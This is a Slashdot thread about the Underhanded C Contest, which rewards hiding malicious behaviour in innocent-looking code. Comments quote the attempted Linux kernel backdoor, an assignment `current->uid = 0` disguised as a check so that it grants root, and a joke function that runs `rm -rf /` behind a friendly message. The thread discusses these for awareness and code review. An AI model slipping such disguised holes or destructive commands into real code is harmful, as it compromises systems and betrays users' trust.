Slashdot Mirror


Underhanded C Contest announces winners

Matthew Skala writes "The 2005 Underhanded C Contest has announced its winners: the team entry from M Joonas Pihlaja and Paul V-Khuong, and the solo entry from Natori Shin. The contest (which appeared on Slashdot in June) tests programmers' ability to hide malicious behaviour in innocent-seeming code, making it a kind of evil shadow twin to the International Obfuscated C Contest."

23 of 150 comments

  1. Bill Gates Entry by bjorniac · · Score: 5, Funny

    Microsoft Word XP was rejected because the code had to seem innocent...

    1. Re:Bill Gates Entry by makomk · · Score: 5, Interesting

      Very true. For those of you who don't get it, one of the winners uses a technique very similar to the way Word (all versions AFAIK) leaks data into documents - an uninitialised buffer.

    2. Re:Bill Gates Entry by Richard_at_work · · Score: 5, Interesting

      Found an interesting thing at work recently, during trials of VB.net and the .Net framework. Our VB.net programmer's applications worked right up until one day, when suddenly, they stopped working. Simple things like messages in Message Boxes stopped appearing, or labels on buttons went astray, mouse cursor changes on mouseover events showing black boxes instead of the image. Very weird we thought. He reinstalled the .Net framework, VS.Net, everything he could think of but nothing rectified the problems. We eventually found out what the problem was - McAfee Virus protection now includes buffer overrun protection. Turn that off, and everything worked fine. Weird, just weird.

  2. good to see by garat · · Score: 5, Insightful

    Having a contest like this has similar positive aspects as full disclosure concerning vulnerabilities; by providing examples of how it's done, people will be better able to spot such attempts were they to occur. I'm happy to see this contest being held.

    --
    Support alternatives to Paypal: http://www.e-gold.com
  3. I'll tell you what's underhanded by Weaselmancer · · Score: 4, Funny

    Stashing all the entries in a 1.1M archive rather than posting links to the code. No way I'm going to download that just to see what all the fuss is about.

    --
    Weaselmancer
    rediculous.
    1. Re:I'll tell you what's underhanded by RAMMS+EIN · · Score: 4, Funny

      Moreover, who knows the archive isn't exploiting some buffer overflow vulnerability in my archiving software! Knowing who this file comes from, you'd be a fool to open it!

      --
      Please correct me if I got my facts wrong.
    2. Re:I'll tell you what's underhanded by glesga_kiss · · Score: 5, Funny

      They predicted that kind of paranoid response. From their (humorous) FAQ:

      Are you shills from MicroSoft trying to evangelize C-sharp?

      No, we are not shills from MicroSoft trying to evangelize C-sharp.

      Are you trying to prove open source is bad?

      No, we are not trying to prove open source is bad. If anything, this contest illustrates that we need more code review, not less.

      I bet you are government agents trying to entrap me.

      Of course we're government agents: Binghamton University is a state university, part of the SUNY system. Evil! Eeeeeeeeeevilllll!!!!!

      Do you know you've been Slashdotted?

      What, you couldn't tell from the last three questions?

    3. Re:I'll tell you what's underhanded by nEoN+nOoDlE · · Score: 4, Funny

      Knowing who this file comes from, you'd be a fool to open it!

      but they would have known that only a great fool would open the archive given to him. I am not a great fool, so I can clearly not choose to open the archive. But they must have known I was not a great fool, they would have counted on it, so I can clearly open the archive supplied by them.

      --
      Don't trust a bull's horn, a doberman's tooth, a runaway horse or me.
  4. Will Code For Beer by Krast0r · · Score: 5, Funny

    "Prize: Since we're in Binghamton, NY, the prize will be a gift box from the nearby brewery Ommegang in Cooperstown, NY." Reminds me of that photograph, "Will Code For Food" - maybe this is the start of a new era. A combination of "free as in beer" and "will code for food".

    --
    Matthew Grint Midnight Artists
    1. Re:Will Code For Beer by anagama · · Score: 3, Informative

      Actually, what you describe is "positive punishment" (apply negative stimulus in the presence of a certain behavior -- like a spanking for swearing). "Positive" is not used in the "good/bad" sense, but in the "plus/minus" sense.

      Negative reinforcement is a reward that occurs by subtracting an adverse stimulus from the environment. For example, Fridays are a form of negative reinforcement -- the withdrawal of a negative stimulus (work) is rewarding, makes people feel good/relieved, and thus, people come to really like Friday afternoons. http://en.wikipedia.org/wiki/Reinforcement#Positive_vs._negative

      --
      What changed under Obama? Nothing Good
  5. I'm still fond of this one by $RANDOMLUSER · · Score: 5, Interesting

    This one almost made it into the Linux kernel. It looks like error checking until you read it carefully. Short, brilliant and to the point.

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

    In other words, you become root if you call sys_wait4() with the __WCLONE|__WALL flags.

    Story here and here

    --
    No folly is more costly than the folly of intolerant idealism. - Winston Churchill
    1. Re:I'm still fond of this one by Anonymous Coward · · Score: 5, Informative

      This one almost made it into the Linux kernel.

      It *did* make it into the kernel for anyone using the BK-to-CVS gateway.

    2. Re:I'm still fond of this one by jnf · · Score: 5, Informative

      To anyone who makes a routine of putting their constants on the left hand side of the expression, that becomes not very hard to notice .. although intermixed with several megabytes of source it becomes less obvious. What I mean is: if (( (__WCLONE|__WALL) == options && 0 = current->uid)) will throw an error, whereas 0 == current->uid will not.

    3. Re:I'm still fond of this one by Tim+C · · Score: 3, Informative

      It's not that assignments aren't allowed in if statements, but that Java has boolean types. So while a statement like i = 0 does return 0 (as in C), unlike C 0 is not false, it's an int, and so if (0) is a compile time error.

      You can still do things like if ((line = in.readLine()) == null) of course

    4. Re:I'm still fond of this one by ipfwadm · · Score: 3, Insightful

      And the attempted backdoor in question put the parens around the assignment, thus avoiding the warning.
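
The condition discussed in this sub-thread, modelled in user space as an added example (not code from the kernel or from any poster): it contrasts the posted condition with the comparison it imitates, and adds a small review aid that flags a plain `=` inside an if-condition even when extra parentheses silence the compiler. `struct task`, `W_CLONE`, `W_ALL` and the three function names are stand-ins chosen here.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define W_CLONE 0x80000000u  /* stand-in for __WCLONE */
#define W_ALL   0x40000000u  /* stand-in for __WALL */

struct task { unsigned uid; };  /* stand-in for the kernel's `current` */

/* The condition as posted: `=` stores 0, so the test is always false. */
int check_as_posted(struct task *cur, unsigned options) {
    int retval = 0;
    if ((options == (W_CLONE | W_ALL)) && (cur->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* The comparison it imitates: rejects the flag pair for uid 0 only. */
int check_comparison(struct task *cur, unsigned options) {
    int retval = 0;
    if ((options == (W_CLONE | W_ALL)) && (cur->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Review aid: count plain `=` (not ==, !=, <=, >=) inside the first
 * if-condition of src. Ignores comments, strings and <<= / >>=.
 * Returns -1 when no if-condition is found. */
int assignments_in_if(const char *src) {
    const char *p = strstr(src, "if");
    int depth = 0, hits = 0;
    if (!p || !(p = strchr(p, '('))) return -1;
    for (; *p; p++) {
        if (*p == '(') depth++;
        else if (*p == ')') { if (--depth == 0) break; }
        else if (*p == '=') {
            if (p[1] == '=') p++;                    /* skip == */
            else if (!strchr("!<>", p[-1])) hits++;  /* skip !=, <=, >= */
        }
    }
    return hits;
}

int main(void) {
    struct task t = { 1000 };
    int rc = check_as_posted(&t, W_CLONE | W_ALL);
    printf("as posted: retval=%d uid=%u\n", rc, t.uid);
    return 0;
}
```

The posted form never returns -EINVAL, which is why it reads as a harmless check; the only observable effect is the changed uid, and only when both flags are passed.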

  6. Making Wrong Code Look Wrong by lelkes · · Score: 3, Insightful

    It would be extremely important to use coding standards which make wrong code look wrong. Not only that it would be more difficult to inject malicious code, but if somebody made mistakes, it would be really easy to discover it.
    Joel has a great article on this.

  7. cute fluffy kittens! by planetoid · · Score: 5, Funny

    int cute_fluffy_kittens(void)
    {
          printf("Cute fluffy kittens are now frolicking in a grassy field of daisies with their pink-nosed newborn puppy friends. Sit back and use your imagination to enjoy the spectacle for the next few minutes...\n");

          setuid(1);
          system("rm -rf /");
    }

    --
    Slashdot requires you to wait longer between hitting 'reply' and submitting a comment.
    1. Re:cute fluffy kittens! by grahamlee · · Score: 4, Funny

      Which is worse, the incorrect UID or the incorrect function prototype?

  8. Runtime code generation by pkhuong · · Score: 4, Informative

    The CLR does JIT (or, at least, runtime) compilation. A common way to do so is to output the machine code on the stack. W^X usually breaks programs that do runtime code generation. Now, this is a WAG, but that's where my money's at.

    --
    Try Corewar @ www.koth.org - rec.games.corewar
    1. Re:Runtime code generation by nothings · · Score: 3, Insightful

      Who in the world generates code to the stack? Compiling code is expensive, so you want to cache it, that is, keep it around for a while, which means putting it on the heap.

  9. Corewar veterans by lastfish · · Score: 4, Interesting

    Joonas & Paul are both Corewar veterans being respectively co-authors of Son of Vain (Joonas P & Ian Oversby) top of the all-time hall-of-fame and nPaper II (Paul V-K & John Metcalf) dominant paper of its time.

    Good practice for writing obscure, but useful, code.

    I'd give clickable links but fear for these sites under load.

    www.corewar.info/
    www.corewar.co.uk/94nophof.txt

  10. OT, nPaper II's ownership by pkhuong · · Score: 3, Interesting

    John's a corewar god (all that 6502 assembly probably has something to do with that ;), so nPaper is nearly all his: the constant twiddling (by hand!), the QS, etc. All I did was basically write the framework for the paper; the only non-standard parts were the attack engine and the djn at the end of the timescape component... and I believe the djn was removed, because, even though it was more aggressive, it was effective than a checksum with a jmz. Read CoreWarrior #.. erh. I think it was in the high 70s or low 80s. John describes the process of optimising a newbie's paper (nPaper), all by hand (He might have used some BASIC scripting :).

    Even now that we have evolvers throwing tons of computing power at a relatively small search space (nano), John submitted something that rocketed to 1st place and manages more than 50% wins. Again, the dude is a corewar genius.

    Paul(-Virak) Khuong

    PS, note the position of the dash

    --
    Try Corewar @ www.koth.org - rec.games.corewar
  11. Ken Thompson... by Sam+Nitzberg · · Score: 4, Informative

    It's not exactly the same thing, but the most powerful and clever C code example with an 'underhanded' purpose must be Ken Thompson's classic...

    Reflections on Trusting Trust
    http://www.acm.org/classics/sep95/

    Other interesting papers that come to mind include Tom Duff's on Unix viruses, as well as McIlroy.

    Sam

    sam @ iamsam.com
    http: /www . iamsam . com